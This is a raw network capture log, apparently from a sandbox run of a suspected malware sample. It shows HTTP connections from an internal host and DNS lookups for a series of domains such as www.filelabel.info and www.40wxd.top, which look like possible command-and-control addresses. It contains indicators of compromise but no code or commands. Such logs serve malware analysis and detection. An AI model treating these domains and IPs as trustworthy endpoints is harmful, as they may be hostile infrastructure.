Oct 24, 2024 08:04:03.755834103 CEST  80       50041    52.20.84.62      192.168.2.4
Oct 24, 2024 08:04:03.755898952 CEST  50041    80       192.168.2.4      52.20.84.62
Oct 24, 2024 08:04:03.767206907 CEST  50041    80       192.168.2.4      52.20.84.62
Oct 24, 2024 08:04:03.772561073 CEST  80       50041    52.20.84.62      192.168.2.4
Oct 24, 2024 08:04:04.407469034 CEST  80       50041    52.20.84.62      192.168.2.4
Oct 24, 2024 08:04:04.441127062 CEST  80       50041    52.20.84.62      192.168.2.4
Oct 24, 2024 08:04:04.442205906 CEST  50041    80       192.168.2.4      52.20.84.62
Oct 24, 2024 08:04:05.276798010 CEST  50041    80       192.168.2.4      52.20.84.62
Oct 24, 2024 08:04:06.296138048 CEST  50042    80       192.168.2.4      52.20.84.62
Oct 24, 2024 08:04:06.302140951 CEST  80       50042    52.20.84.62      192.168.2.4
Oct 24, 2024 08:04:06.302406073 CEST  50042    80       192.168.2.4      52.20.84.62
Oct 24, 2024 08:04:06.316636086 CEST  50042    80       192.168.2.4      52.20.84.62
Oct 24, 2024 08:04:06.322499990 CEST  80       50042    52.20.84.62      192.168.2.4
Oct 24, 2024 08:04:06.322545052 CEST  80       50042    52.20.84.62      192.168.2.4
Oct 24, 2024 08:04:06.322576046 CEST  80       50042    52.20.84.62      192.168.2.4
Oct 24, 2024 08:04:06.322602987 CEST  80       50042    52.20.84.62      192.168.2.4
Oct 24, 2024 08:04:06.322630882 CEST  80       50042    52.20.84.62      192.168.2.4
Oct 24, 2024 08:04:06.322698116 CEST  80       50042    52.20.84.62      192.168.2.4
Oct 24, 2024 08:04:06.322726011 CEST  80       50042    52.20.84.62      192.168.2.4
Oct 24, 2024 08:04:06.322757959 CEST  80       50042    52.20.84.62      192.168.2.4
Oct 24, 2024 08:04:06.322786093 CEST  80       50042    52.20.84.62      192.168.2.4
Oct 24, 2024 08:04:06.975811005 CEST  80       50042    52.20.84.62      192.168.2.4
Oct 24, 2024 08:04:07.013377905 CEST  80       50042    52.20.84.62      192.168.2.4
Oct 24, 2024 08:04:07.013442039 CEST  50042    80       192.168.2.4      52.20.84.62
Oct 24, 2024 08:04:07.823587894 CEST  50042    80       192.168.2.4      52.20.84.62
Oct 24, 2024 08:04:08.841902018 CEST  50043    80       192.168.2.4      52.20.84.62
                                                                                                                                  Oct 24, 2024 08:04:08.886890888 CEST805004352.20.84.62192.168.2.4
                                                                                                                                  Oct 24, 2024 08:04:08.891686916 CEST5004380192.168.2.452.20.84.62
                                                                                                                                  Oct 24, 2024 08:04:08.901424885 CEST5004380192.168.2.452.20.84.62
                                                                                                                                  Oct 24, 2024 08:04:08.906934977 CEST805004352.20.84.62192.168.2.4
                                                                                                                                  Oct 24, 2024 08:04:09.582313061 CEST805004352.20.84.62192.168.2.4
                                                                                                                                  Oct 24, 2024 08:04:09.616599083 CEST805004352.20.84.62192.168.2.4
                                                                                                                                  Oct 24, 2024 08:04:09.616740942 CEST5004380192.168.2.452.20.84.62
                                                                                                                                  Oct 24, 2024 08:04:09.617779970 CEST5004380192.168.2.452.20.84.62
                                                                                                                                  Oct 24, 2024 08:04:09.624871016 CEST805004352.20.84.62192.168.2.4
                                                                                                                                  Oct 24, 2024 08:04:14.654799938 CEST5004480192.168.2.43.33.130.190
                                                                                                                                  Oct 24, 2024 08:04:14.660274982 CEST80500443.33.130.190192.168.2.4
                                                                                                                                  Oct 24, 2024 08:04:14.660764933 CEST5004480192.168.2.43.33.130.190
                                                                                                                                  Oct 24, 2024 08:04:14.669733047 CEST5004480192.168.2.43.33.130.190
                                                                                                                                  Oct 24, 2024 08:04:14.675549984 CEST80500443.33.130.190192.168.2.4
                                                                                                                                  Oct 24, 2024 08:04:15.293401957 CEST80500443.33.130.190192.168.2.4
                                                                                                                                  Oct 24, 2024 08:04:15.293627977 CEST5004480192.168.2.43.33.130.190
                                                                                                                                  Oct 24, 2024 08:04:16.183418036 CEST5004480192.168.2.43.33.130.190
                                                                                                                                  Oct 24, 2024 08:04:16.189342022 CEST80500443.33.130.190192.168.2.4
                                                                                                                                  Oct 24, 2024 08:04:17.203664064 CEST5004580192.168.2.43.33.130.190
                                                                                                                                  Oct 24, 2024 08:04:17.209417105 CEST80500453.33.130.190192.168.2.4
                                                                                                                                  Oct 24, 2024 08:04:17.209553003 CEST5004580192.168.2.43.33.130.190
                                                                                                                                  Oct 24, 2024 08:04:17.223931074 CEST5004580192.168.2.43.33.130.190
                                                                                                                                  Oct 24, 2024 08:04:17.229794025 CEST80500453.33.130.190192.168.2.4
                                                                                                                                  Oct 24, 2024 08:04:18.730659008 CEST5004580192.168.2.43.33.130.190
                                                                                                                                  Oct 24, 2024 08:04:18.737083912 CEST80500453.33.130.190192.168.2.4
                                                                                                                                  Oct 24, 2024 08:04:18.742768049 CEST5004580192.168.2.43.33.130.190
                                                                                                                                  Oct 24, 2024 08:04:19.748864889 CEST5004680192.168.2.43.33.130.190
                                                                                                                                  Oct 24, 2024 08:04:19.754643917 CEST80500463.33.130.190192.168.2.4
                                                                                                                                  Oct 24, 2024 08:04:19.754734039 CEST5004680192.168.2.43.33.130.190
                                                                                                                                  Oct 24, 2024 08:04:19.763864994 CEST5004680192.168.2.43.33.130.190
                                                                                                                                  Oct 24, 2024 08:04:19.769810915 CEST80500463.33.130.190192.168.2.4
                                                                                                                                  Oct 24, 2024 08:04:19.769856930 CEST80500463.33.130.190192.168.2.4
                                                                                                                                  Oct 24, 2024 08:04:19.769885063 CEST80500463.33.130.190192.168.2.4
                                                                                                                                  Oct 24, 2024 08:04:19.769912958 CEST80500463.33.130.190192.168.2.4
                                                                                                                                  Oct 24, 2024 08:04:19.769970894 CEST80500463.33.130.190192.168.2.4
                                                                                                                                  Oct 24, 2024 08:04:19.770030022 CEST80500463.33.130.190192.168.2.4
                                                                                                                                  Oct 24, 2024 08:04:19.770060062 CEST80500463.33.130.190192.168.2.4
                                                                                                                                  Oct 24, 2024 08:04:19.770087957 CEST80500463.33.130.190192.168.2.4
                                                                                                                                  Oct 24, 2024 08:04:19.770116091 CEST80500463.33.130.190192.168.2.4
                                                                                                                                  Oct 24, 2024 08:04:21.276828051 CEST5004680192.168.2.43.33.130.190
                                                                                                                                  Oct 24, 2024 08:04:21.283118010 CEST80500463.33.130.190192.168.2.4
                                                                                                                                  Oct 24, 2024 08:04:21.283308983 CEST5004680192.168.2.43.33.130.190
                                                                                                                                  Oct 24, 2024 08:04:22.295094967 CEST5004780192.168.2.43.33.130.190
                                                                                                                                  Oct 24, 2024 08:04:22.301141024 CEST80500473.33.130.190192.168.2.4
                                                                                                                                  Oct 24, 2024 08:04:22.306771040 CEST5004780192.168.2.43.33.130.190
                                                                                                                                  Oct 24, 2024 08:04:22.324640036 CEST5004780192.168.2.43.33.130.190
                                                                                                                                  Oct 24, 2024 08:04:22.330451965 CEST80500473.33.130.190192.168.2.4
                                                                                                                                  Oct 24, 2024 08:04:23.949486017 CEST80500473.33.130.190192.168.2.4
                                                                                                                                  Oct 24, 2024 08:04:23.950114965 CEST80500473.33.130.190192.168.2.4
                                                                                                                                  Oct 24, 2024 08:04:23.950320959 CEST5004780192.168.2.43.33.130.190
                                                                                                                                  Oct 24, 2024 08:04:23.952974081 CEST5004780192.168.2.43.33.130.190
                                                                                                                                  Oct 24, 2024 08:04:23.958738089 CEST80500473.33.130.190192.168.2.4
                                                                                                                                  Oct 24, 2024 08:04:29.258044958 CEST5004880192.168.2.4142.250.186.83
                                                                                                                                  Oct 24, 2024 08:04:29.263850927 CEST8050048142.250.186.83192.168.2.4
                                                                                                                                  Oct 24, 2024 08:04:29.264061928 CEST5004880192.168.2.4142.250.186.83
                                                                                                                                  Oct 24, 2024 08:04:29.277343988 CEST5004880192.168.2.4142.250.186.83
                                                                                                                                  Oct 24, 2024 08:04:29.282810926 CEST8050048142.250.186.83192.168.2.4
                                                                                                                                  Oct 24, 2024 08:04:30.249777079 CEST8050048142.250.186.83192.168.2.4
                                                                                                                                  Oct 24, 2024 08:04:30.292422056 CEST5004880192.168.2.4142.250.186.83
                                                                                                                                  Oct 24, 2024 08:04:30.379283905 CEST8050048142.250.186.83192.168.2.4
                                                                                                                                  Oct 24, 2024 08:04:30.384265900 CEST5004880192.168.2.4142.250.186.83
                                                                                                                                  Oct 24, 2024 08:04:30.792503119 CEST5004880192.168.2.4142.250.186.83
                                                                                                                                  Oct 24, 2024 08:04:31.810949087 CEST5004980192.168.2.4142.250.186.83
                                                                                                                                  Oct 24, 2024 08:04:31.884586096 CEST8050049142.250.186.83192.168.2.4
                                                                                                                                  Oct 24, 2024 08:04:31.884819031 CEST5004980192.168.2.4142.250.186.83
                                                                                                                                  Oct 24, 2024 08:04:31.896152020 CEST5004980192.168.2.4142.250.186.83
                                                                                                                                  Oct 24, 2024 08:04:31.901792049 CEST8050049142.250.186.83192.168.2.4
                                                                                                                                  Oct 24, 2024 08:04:32.837163925 CEST8050049142.250.186.83192.168.2.4
                                                                                                                                  Oct 24, 2024 08:04:32.886049986 CEST5004980192.168.2.4142.250.186.83
                                                                                                                                  Oct 24, 2024 08:04:32.958301067 CEST8050049142.250.186.83192.168.2.4
                                                                                                                                  Oct 24, 2024 08:04:32.958596945 CEST5004980192.168.2.4142.250.186.83
                                                                                                                                  Oct 24, 2024 08:04:33.401726961 CEST5004980192.168.2.4142.250.186.83
                                                                                                                                  Oct 24, 2024 08:04:34.420646906 CEST5005080192.168.2.4142.250.186.83
                                                                                                                                  Oct 24, 2024 08:04:34.426186085 CEST8050050142.250.186.83192.168.2.4
                                                                                                                                  Oct 24, 2024 08:04:34.428679943 CEST5005080192.168.2.4142.250.186.83
                                                                                                                                  Oct 24, 2024 08:04:34.440768003 CEST5005080192.168.2.4142.250.186.83
                                                                                                                                  Oct 24, 2024 08:04:34.446681976 CEST8050050142.250.186.83192.168.2.4
                                                                                                                                  Oct 24, 2024 08:04:34.446703911 CEST8050050142.250.186.83192.168.2.4
                                                                                                                                  Oct 24, 2024 08:04:34.446717024 CEST8050050142.250.186.83192.168.2.4
                                                                                                                                  Oct 24, 2024 08:04:34.446728945 CEST8050050142.250.186.83192.168.2.4
                                                                                                                                  Oct 24, 2024 08:04:34.446754932 CEST8050050142.250.186.83192.168.2.4
                                                                                                                                  Oct 24, 2024 08:04:34.446768045 CEST8050050142.250.186.83192.168.2.4
                                                                                                                                  Oct 24, 2024 08:04:34.446779966 CEST8050050142.250.186.83192.168.2.4
                                                                                                                                  Oct 24, 2024 08:04:34.446791887 CEST8050050142.250.186.83192.168.2.4
                                                                                                                                  Oct 24, 2024 08:04:34.446803093 CEST8050050142.250.186.83192.168.2.4
                                                                                                                                  Oct 24, 2024 08:04:35.374715090 CEST8050050142.250.186.83192.168.2.4
                                                                                                                                  Oct 24, 2024 08:04:35.417323112 CEST5005080192.168.2.4142.250.186.83
                                                                                                                                  Oct 24, 2024 08:04:35.494126081 CEST8050050142.250.186.83192.168.2.4
                                                                                                                                  Oct 24, 2024 08:04:35.494323015 CEST5005080192.168.2.4142.250.186.83
                                                                                                                                  Oct 24, 2024 08:04:35.948725939 CEST5005080192.168.2.4142.250.186.83
                                                                                                                                  Oct 24, 2024 08:04:36.968543053 CEST5005180192.168.2.4142.250.186.83
                                                                                                                                  Oct 24, 2024 08:04:36.974323988 CEST8050051142.250.186.83192.168.2.4
                                                                                                                                  Oct 24, 2024 08:04:36.980776072 CEST5005180192.168.2.4142.250.186.83
                                                                                                                                  Oct 24, 2024 08:04:36.984633923 CEST5005180192.168.2.4142.250.186.83
                                                                                                                                  Oct 24, 2024 08:04:36.990405083 CEST8050051142.250.186.83192.168.2.4
                                                                                                                                  Oct 24, 2024 08:04:37.922194004 CEST8050051142.250.186.83192.168.2.4
                                                                                                                                  Oct 24, 2024 08:04:37.964229107 CEST5005180192.168.2.4142.250.186.83
                                                                                                                                  Oct 24, 2024 08:04:38.041733027 CEST8050051142.250.186.83192.168.2.4
                                                                                                                                  Oct 24, 2024 08:04:38.041881084 CEST5005180192.168.2.4142.250.186.83
                                                                                                                                  Oct 24, 2024 08:04:38.042768002 CEST5005180192.168.2.4142.250.186.83
                                                                                                                                  Oct 24, 2024 08:04:38.048394918 CEST8050051142.250.186.83192.168.2.4
                                                                                                                                  Oct 24, 2024 08:04:43.081721067 CEST5005280192.168.2.4172.81.61.224
                                                                                                                                  Oct 24, 2024 08:04:43.090186119 CEST8050052172.81.61.224192.168.2.4
                                                                                                                                  Oct 24, 2024 08:04:43.090334892 CEST5005280192.168.2.4172.81.61.224
                                                                                                                                  Oct 24, 2024 08:04:43.105602026 CEST5005280192.168.2.4172.81.61.224
                                                                                                                                  Oct 24, 2024 08:04:43.111613035 CEST8050052172.81.61.224192.168.2.4
                                                                                                                                  Oct 24, 2024 08:04:43.597547054 CEST8050052172.81.61.224192.168.2.4
                                                                                                                                  Oct 24, 2024 08:04:43.597788095 CEST5005280192.168.2.4172.81.61.224
                                                                                                                                  Oct 24, 2024 08:04:44.620569944 CEST5005280192.168.2.4172.81.61.224
                                                                                                                                  Oct 24, 2024 08:04:44.626730919 CEST8050052172.81.61.224192.168.2.4
                                                                                                                                  Oct 24, 2024 08:04:45.638631105 CEST5005380192.168.2.4172.81.61.224
                                                                                                                                  Oct 24, 2024 08:04:45.644609928 CEST8050053172.81.61.224192.168.2.4
                                                                                                                                  Oct 24, 2024 08:04:45.644699097 CEST5005380192.168.2.4172.81.61.224
                                                                                                                                  Oct 24, 2024 08:04:45.653672934 CEST5005380192.168.2.4172.81.61.224
                                                                                                                                  Oct 24, 2024 08:04:45.659434080 CEST8050053172.81.61.224192.168.2.4
                                                                                                                                  Oct 24, 2024 08:04:46.150494099 CEST8050053172.81.61.224192.168.2.4
                                                                                                                                  Oct 24, 2024 08:04:46.153040886 CEST5005380192.168.2.4172.81.61.224
                                                                                                                                  Oct 24, 2024 08:04:47.167506933 CEST5005380192.168.2.4172.81.61.224
                                                                                                                                  Oct 24, 2024 08:04:47.173175097 CEST8050053172.81.61.224192.168.2.4
                                                                                                                                  Oct 24, 2024 08:04:48.185678005 CEST5005480192.168.2.4172.81.61.224
                                                                                                                                  Oct 24, 2024 08:04:48.348596096 CEST8050054172.81.61.224192.168.2.4
                                                                                                                                  Oct 24, 2024 08:04:48.354537964 CEST5005480192.168.2.4172.81.61.224
                                                                                                                                  Oct 24, 2024 08:04:48.360774040 CEST5005480192.168.2.4172.81.61.224
                                                                                                                                  Oct 24, 2024 08:04:48.366657019 CEST8050054172.81.61.224192.168.2.4
                                                                                                                                  Oct 24, 2024 08:04:48.366728067 CEST8050054172.81.61.224192.168.2.4
                                                                                                                                  Oct 24, 2024 08:04:48.366758108 CEST8050054172.81.61.224192.168.2.4
                                                                                                                                  Oct 24, 2024 08:04:48.366786003 CEST8050054172.81.61.224192.168.2.4
                                                                                                                                  Oct 24, 2024 08:04:48.366812944 CEST8050054172.81.61.224192.168.2.4
                                                                                                                                  Oct 24, 2024 08:04:48.366868019 CEST8050054172.81.61.224192.168.2.4
                                                                                                                                  Oct 24, 2024 08:04:48.366895914 CEST8050054172.81.61.224192.168.2.4
                                                                                                                                  Oct 24, 2024 08:04:48.366923094 CEST8050054172.81.61.224192.168.2.4
                                                                                                                                  Oct 24, 2024 08:04:48.366951942 CEST8050054172.81.61.224192.168.2.4
                                                                                                                                  Oct 24, 2024 08:04:48.860563040 CEST8050054172.81.61.224192.168.2.4
                                                                                                                                  Oct 24, 2024 08:04:48.861759901 CEST5005480192.168.2.4172.81.61.224
                                                                                                                                  Oct 24, 2024 08:04:49.870652914 CEST5005480192.168.2.4172.81.61.224
                                                                                                                                  Oct 24, 2024 08:04:49.876667976 CEST8050054172.81.61.224192.168.2.4
                                                                                                                                  Oct 24, 2024 08:04:50.888809919 CEST5005580192.168.2.4172.81.61.224
                                                                                                                                  Oct 24, 2024 08:04:50.894787073 CEST8050055172.81.61.224192.168.2.4
                                                                                                                                  Oct 24, 2024 08:04:50.897676945 CEST5005580192.168.2.4172.81.61.224
                                                                                                                                  Oct 24, 2024 08:04:50.909794092 CEST5005580192.168.2.4172.81.61.224
Oct 24, 2024 08:04:50.915379047 CEST | 80 | 50055 | 172.81.61.224 | 192.168.2.4
Oct 24, 2024 08:04:51.399091959 CEST | 80 | 50055 | 172.81.61.224 | 192.168.2.4
Oct 24, 2024 08:04:51.399210930 CEST | 50055 | 80 | 192.168.2.4 | 172.81.61.224
Oct 24, 2024 08:04:51.400095940 CEST | 50055 | 80 | 192.168.2.4 | 172.81.61.224
Oct 24, 2024 08:04:51.405714035 CEST | 80 | 50055 | 172.81.61.224 | 192.168.2.4
Oct 24, 2024 08:04:56.437323093 CEST | 50056 | 80 | 192.168.2.4 | 3.33.130.190
Oct 24, 2024 08:04:56.444000006 CEST | 80 | 50056 | 3.33.130.190 | 192.168.2.4
Oct 24, 2024 08:04:56.444217920 CEST | 50056 | 80 | 192.168.2.4 | 3.33.130.190
Oct 24, 2024 08:04:56.458575964 CEST | 50056 | 80 | 192.168.2.4 | 3.33.130.190
Oct 24, 2024 08:04:56.464730024 CEST | 80 | 50056 | 3.33.130.190 | 192.168.2.4
Oct 24, 2024 08:04:57.080620050 CEST | 80 | 50056 | 3.33.130.190 | 192.168.2.4
Oct 24, 2024 08:04:57.080718040 CEST | 50056 | 80 | 192.168.2.4 | 3.33.130.190
Oct 24, 2024 08:04:57.964241982 CEST | 50056 | 80 | 192.168.2.4 | 3.33.130.190
Oct 24, 2024 08:04:57.970251083 CEST | 80 | 50056 | 3.33.130.190 | 192.168.2.4
Oct 24, 2024 08:04:58.982498884 CEST | 50057 | 80 | 192.168.2.4 | 3.33.130.190
Oct 24, 2024 08:04:58.988084078 CEST | 80 | 50057 | 3.33.130.190 | 192.168.2.4
Oct 24, 2024 08:04:58.990601063 CEST | 50057 | 80 | 192.168.2.4 | 3.33.130.190
Oct 24, 2024 08:04:59.002609015 CEST | 50057 | 80 | 192.168.2.4 | 3.33.130.190
Oct 24, 2024 08:04:59.008332968 CEST | 80 | 50057 | 3.33.130.190 | 192.168.2.4
Oct 24, 2024 08:05:00.514601946 CEST | 50057 | 80 | 192.168.2.4 | 3.33.130.190
Oct 24, 2024 08:05:00.520837069 CEST | 80 | 50057 | 3.33.130.190 | 192.168.2.4
Oct 24, 2024 08:05:00.526652098 CEST | 50057 | 80 | 192.168.2.4 | 3.33.130.190
Oct 24, 2024 08:05:01.530056000 CEST | 50058 | 80 | 192.168.2.4 | 3.33.130.190
Oct 24, 2024 08:05:01.535835981 CEST | 80 | 50058 | 3.33.130.190 | 192.168.2.4
Oct 24, 2024 08:05:01.535959959 CEST | 50058 | 80 | 192.168.2.4 | 3.33.130.190
Oct 24, 2024 08:05:01.549972057 CEST | 50058 | 80 | 192.168.2.4 | 3.33.130.190
Oct 24, 2024 08:05:01.555814028 CEST | 80 | 50058 | 3.33.130.190 | 192.168.2.4
Oct 24, 2024 08:05:01.555857897 CEST | 80 | 50058 | 3.33.130.190 | 192.168.2.4
Oct 24, 2024 08:05:01.555888891 CEST | 80 | 50058 | 3.33.130.190 | 192.168.2.4
Oct 24, 2024 08:05:01.555916071 CEST | 80 | 50058 | 3.33.130.190 | 192.168.2.4
Oct 24, 2024 08:05:01.555944920 CEST | 80 | 50058 | 3.33.130.190 | 192.168.2.4
Oct 24, 2024 08:05:01.555979013 CEST | 80 | 50058 | 3.33.130.190 | 192.168.2.4
Oct 24, 2024 08:05:01.556008101 CEST | 80 | 50058 | 3.33.130.190 | 192.168.2.4
Oct 24, 2024 08:05:01.556035995 CEST | 80 | 50058 | 3.33.130.190 | 192.168.2.4
Oct 24, 2024 08:05:01.556063890 CEST | 80 | 50058 | 3.33.130.190 | 192.168.2.4
Oct 24, 2024 08:05:02.183532000 CEST | 80 | 50058 | 3.33.130.190 | 192.168.2.4
Oct 24, 2024 08:05:02.190581083 CEST | 50058 | 80 | 192.168.2.4 | 3.33.130.190
Oct 24, 2024 08:05:03.281073093 CEST | 50058 | 80 | 192.168.2.4 | 3.33.130.190
Oct 24, 2024 08:05:03.286623001 CEST | 80 | 50058 | 3.33.130.190 | 192.168.2.4
Oct 24, 2024 08:05:04.295176029 CEST | 50059 | 80 | 192.168.2.4 | 3.33.130.190
Oct 24, 2024 08:05:04.301156998 CEST | 80 | 50059 | 3.33.130.190 | 192.168.2.4
Oct 24, 2024 08:05:04.301448107 CEST | 50059 | 80 | 192.168.2.4 | 3.33.130.190
Oct 24, 2024 08:05:04.308687925 CEST | 50059 | 80 | 192.168.2.4 | 3.33.130.190
Oct 24, 2024 08:05:04.314342976 CEST | 80 | 50059 | 3.33.130.190 | 192.168.2.4
Oct 24, 2024 08:05:04.937974930 CEST | 80 | 50059 | 3.33.130.190 | 192.168.2.4
Oct 24, 2024 08:05:04.938565016 CEST | 80 | 50059 | 3.33.130.190 | 192.168.2.4
Oct 24, 2024 08:05:04.938834906 CEST | 50059 | 80 | 192.168.2.4 | 3.33.130.190
Oct 24, 2024 08:05:04.940757036 CEST | 50059 | 80 | 192.168.2.4 | 3.33.130.190
Oct 24, 2024 08:05:04.946450949 CEST | 80 | 50059 | 3.33.130.190 | 192.168.2.4
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 24, 2024 08:01:34.623094082 CEST | 55128 | 53 | 192.168.2.4 | 1.1.1.1
Oct 24, 2024 08:01:35.012753963 CEST | 53 | 55128 | 1.1.1.1 | 192.168.2.4
Oct 24, 2024 08:01:51.564795971 CEST | 54829 | 53 | 192.168.2.4 | 1.1.1.1
Oct 24, 2024 08:01:51.590894938 CEST | 53 | 54829 | 1.1.1.1 | 192.168.2.4
Oct 24, 2024 08:02:05.077291965 CEST | 59500 | 53 | 192.168.2.4 | 1.1.1.1
Oct 24, 2024 08:02:05.086961031 CEST | 53 | 59500 | 1.1.1.1 | 192.168.2.4
Oct 24, 2024 08:02:13.142466068 CEST | 65262 | 53 | 192.168.2.4 | 1.1.1.1
Oct 24, 2024 08:02:13.267828941 CEST | 53 | 65262 | 1.1.1.1 | 192.168.2.4
Oct 24, 2024 08:02:26.907074928 CEST | 64571 | 53 | 192.168.2.4 | 1.1.1.1
Oct 24, 2024 08:02:27.499429941 CEST | 53 | 64571 | 1.1.1.1 | 192.168.2.4
Oct 24, 2024 08:02:41.265954971 CEST | 51998 | 53 | 192.168.2.4 | 1.1.1.1
Oct 24, 2024 08:02:41.279706001 CEST | 53 | 51998 | 1.1.1.1 | 192.168.2.4
Oct 24, 2024 08:02:55.405817986 CEST | 51342 | 53 | 192.168.2.4 | 1.1.1.1
Oct 24, 2024 08:02:55.426300049 CEST | 53 | 51342 | 1.1.1.1 | 192.168.2.4
Oct 24, 2024 08:03:09.202682972 CEST | 55159 | 53 | 192.168.2.4 | 1.1.1.1
Oct 24, 2024 08:03:09.817275047 CEST | 53 | 55159 | 1.1.1.1 | 192.168.2.4
Oct 24, 2024 08:03:24.437043905 CEST | 60516 | 53 | 192.168.2.4 | 1.1.1.1
Oct 24, 2024 08:03:24.461066961 CEST | 53 | 60516 | 1.1.1.1 | 192.168.2.4
Oct 24, 2024 08:03:38.765121937 CEST | 55563 | 53 | 192.168.2.4 | 1.1.1.1
Oct 24, 2024 08:03:38.776810884 CEST | 53 | 55563 | 1.1.1.1 | 192.168.2.4
Oct 24, 2024 08:03:46.844693899 CEST | 55530 | 53 | 192.168.2.4 | 1.1.1.1
Oct 24, 2024 08:03:47.183788061 CEST | 53 | 55530 | 1.1.1.1 | 192.168.2.4
Oct 24, 2024 08:04:01.000586987 CEST | 56481 | 53 | 192.168.2.4 | 1.1.1.1
Oct 24, 2024 08:04:01.195727110 CEST | 53 | 56481 | 1.1.1.1 | 192.168.2.4
Oct 24, 2024 08:04:14.624562979 CEST | 65329 | 53 | 192.168.2.4 | 1.1.1.1
Oct 24, 2024 08:04:14.651712894 CEST | 53 | 65329 | 1.1.1.1 | 192.168.2.4
Oct 24, 2024 08:04:28.970629930 CEST | 54247 | 53 | 192.168.2.4 | 1.1.1.1
Oct 24, 2024 08:04:29.255003929 CEST | 53 | 54247 | 1.1.1.1 | 192.168.2.4
Oct 24, 2024 08:04:43.063146114 CEST | 54541 | 53 | 192.168.2.4 | 1.1.1.1
Oct 24, 2024 08:04:43.077860117 CEST | 53 | 54541 | 1.1.1.1 | 192.168.2.4
Oct 24, 2024 08:04:56.418346882 CEST | 56329 | 53 | 192.168.2.4 | 1.1.1.1
Oct 24, 2024 08:04:56.432395935 CEST | 53 | 56329 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Oct 24, 2024 08:01:34.623094082 CEST | 192.168.2.4 | 1.1.1.1 | 0xe39e | Standard query (0) | www.specialgift.asia | A (IP address) | IN (0x0001) | false
Oct 24, 2024 08:01:51.564795971 CEST | 192.168.2.4 | 1.1.1.1 | 0x57e7 | Standard query (0) | www.filelabel.info | A (IP address) | IN (0x0001) | false
Oct 24, 2024 08:02:05.077291965 CEST | 192.168.2.4 | 1.1.1.1 | 0x9cf4 | Standard query (0) | www.longfilsalphonse.net | A (IP address) | IN (0x0001) | false
Oct 24, 2024 08:02:13.142466068 CEST | 192.168.2.4 | 1.1.1.1 | 0x2cf4 | Standard query (0) | www.multileveltravel.world | A (IP address) | IN (0x0001) | false
Oct 24, 2024 08:02:26.907074928 CEST | 192.168.2.4 | 1.1.1.1 | 0x6441 | Standard query (0) | www.40wxd.top | A (IP address) | IN (0x0001) | false
Oct 24, 2024 08:02:41.265954971 CEST | 192.168.2.4 | 1.1.1.1 | 0x82b1 | Standard query (0) | www.vasehub.xyz | A (IP address) | IN (0x0001) | false
Oct 24, 2024 08:02:55.405817986 CEST | 192.168.2.4 | 1.1.1.1 | 0x2d02 | Standard query (0) | www.coffee-and-blends.info | A (IP address) | IN (0x0001) | false
Oct 24, 2024 08:03:09.202682972 CEST | 192.168.2.4 | 1.1.1.1 | 0x531 | Standard query (0) | www.tmstore.click | A (IP address) | IN (0x0001) | false
Oct 24, 2024 08:03:24.437043905 CEST | 192.168.2.4 | 1.1.1.1 | 0xbf40 | Standard query (0) | www.softillery.info | A (IP address) | IN (0x0001) | false
Oct 24, 2024 08:03:38.765121937 CEST | 192.168.2.4 | 1.1.1.1 | 0xc035 | Standard query (0) | www.gemtastic.shop | A (IP address) | IN (0x0001) | false
Oct 24, 2024 08:03:46.844693899 CEST | 192.168.2.4 | 1.1.1.1 | 0x14fc | Standard query (0) | www.nad5.shop | A (IP address) | IN (0x0001) | false
Oct 24, 2024 08:04:01.000586987 CEST | 192.168.2.4 | 1.1.1.1 | 0x4245 | Standard query (0) | www.luxe.guru | A (IP address) | IN (0x0001) | false
Oct 24, 2024 08:04:14.624562979 CEST | 192.168.2.4 | 1.1.1.1 | 0x397c | Standard query (0) | www.digitalbloom.info | A (IP address) | IN (0x0001) | false
Oct 24, 2024 08:04:28.970629930 CEST | 192.168.2.4 | 1.1.1.1 | 0x884f | Standard query (0) | www.amitayush.digital | A (IP address) | IN (0x0001) | false
Oct 24, 2024 08:04:43.063146114 CEST | 192.168.2.4 | 1.1.1.1 | 0x5776 | Standard query (0) | www.moritynomxd.xyz | A (IP address) | IN (0x0001) | false
Oct 24, 2024 08:04:56.418346882 CEST | 192.168.2.4 | 1.1.1.1 | 0xeb83 | Standard query (0) | www.tukaari.shop | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Oct 24, 2024 08:01:35.012753963 CEST | 1.1.1.1 | 192.168.2.4 | 0xe39e | No error (0) | www.specialgift.asia | www.specialgift.asia.s.strikinglydns.com | | CNAME (Canonical name) | IN (0x0001) | false
Oct 24, 2024 08:01:35.012753963 CEST | 1.1.1.1 | 192.168.2.4 | 0xe39e | No error (0) | www.specialgift.asia.s.strikinglydns.com | | 35.156.117.131 | A (IP address) | IN (0x0001) | false
Oct 24, 2024 08:01:35.012753963 CEST | 1.1.1.1 | 192.168.2.4 | 0xe39e | No error (0) | www.specialgift.asia.s.strikinglydns.com | | 18.157.120.97 | A (IP address) | IN (0x0001) | false
Oct 24, 2024 08:01:51.590894938 CEST | 1.1.1.1 | 192.168.2.4 | 0x57e7 | No error (0) | www.filelabel.info | filelabel.info | | CNAME (Canonical name) | IN (0x0001) | false
Oct 24, 2024 08:01:51.590894938 CEST | 1.1.1.1 | 192.168.2.4 | 0x57e7 | No error (0) | filelabel.info | | 3.33.130.190 | A (IP address) | IN (0x0001) | false
Oct 24, 2024 08:01:51.590894938 CEST | 1.1.1.1 | 192.168.2.4 | 0x57e7 | No error (0) | filelabel.info | | 15.197.148.33 | A (IP address) | IN (0x0001) | false
Oct 24, 2024 08:02:05.086961031 CEST | 1.1.1.1 | 192.168.2.4 | 0x9cf4 | Name error (3) | www.longfilsalphonse.net | none | none | A (IP address) | IN (0x0001) | false
Oct 24, 2024 08:02:13.267828941 CEST | 1.1.1.1 | 192.168.2.4 | 0x2cf4 | No error (0) | www.multileveltravel.world | multileveltravel.world | | CNAME (Canonical name) | IN (0x0001) | false
Oct 24, 2024 08:02:13.267828941 CEST | 1.1.1.1 | 192.168.2.4 | 0x2cf4 | No error (0) | multileveltravel.world | | 3.33.130.190 | A (IP address) | IN (0x0001) | false
Oct 24, 2024 08:02:13.267828941 CEST | 1.1.1.1 | 192.168.2.4 | 0x2cf4 | No error (0) | multileveltravel.world | | 15.197.148.33 | A (IP address) | IN (0x0001) | false
Oct 24, 2024 08:02:27.499429941 CEST | 1.1.1.1 | 192.168.2.4 | 0x6441 | No error (0) | www.40wxd.top | 40wxd.top | | CNAME (Canonical name) | IN (0x0001) | false
